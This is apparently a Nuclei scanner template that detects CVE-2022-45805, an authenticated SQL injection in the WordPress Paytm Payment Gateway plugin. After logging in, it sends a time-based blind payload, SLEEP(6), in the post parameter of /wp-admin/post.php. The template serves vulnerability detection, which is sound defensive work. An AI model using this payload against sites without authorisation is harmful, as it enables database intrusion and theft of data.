id: CVE-2022-45805 info: name: WordPress Paytm Payment Gateway Plugin <= 2.7.3 - SQL Injection author: theamanrawat severity: high description: | SQL Injection vulnerability in WordPress Paytm Payment Gateway Plugin. This could allow a malicious actor to directly interact with your database, including but not limited to stealing information and creating new administrator accounts. This vulnerability has been fixed in version 2.7.7. remediation: Update to version 2.7.7, or a newer patched version. reference: - https://patchstack.com/database/vulnerability/paytm-payments/wordpress-paytm-payment-gateway-plugin-2-7-3-auth-sql-injection-sqli-vulnerability - https://wordpress.org/plugins/paytm-payments/ - https://nvd.nist.gov/vuln/detail/CVE-2022-45805 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.2 cve-id: CVE-2022-45805 cwe-id: CWE-89 metadata: verified: "true" tags: cve,cve2022,sqli,wordpress,wp-plugin,wp,paytm-payments,authenticated requests: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - | @timeout: 15s GET /wp-admin/post.php?post=1+AND+(SELECT+6205+FROM+(SELECT(SLEEP(6)))RtRs)&action=edit HTTP/1.1 Host: {{Hostname}} cookie-reuse: true matchers: - type: dsl dsl: - 'duration_2>=6' - 'status_code_2 == 200' - 'contains(body_2, "toplevel_page_paytm")' condition: and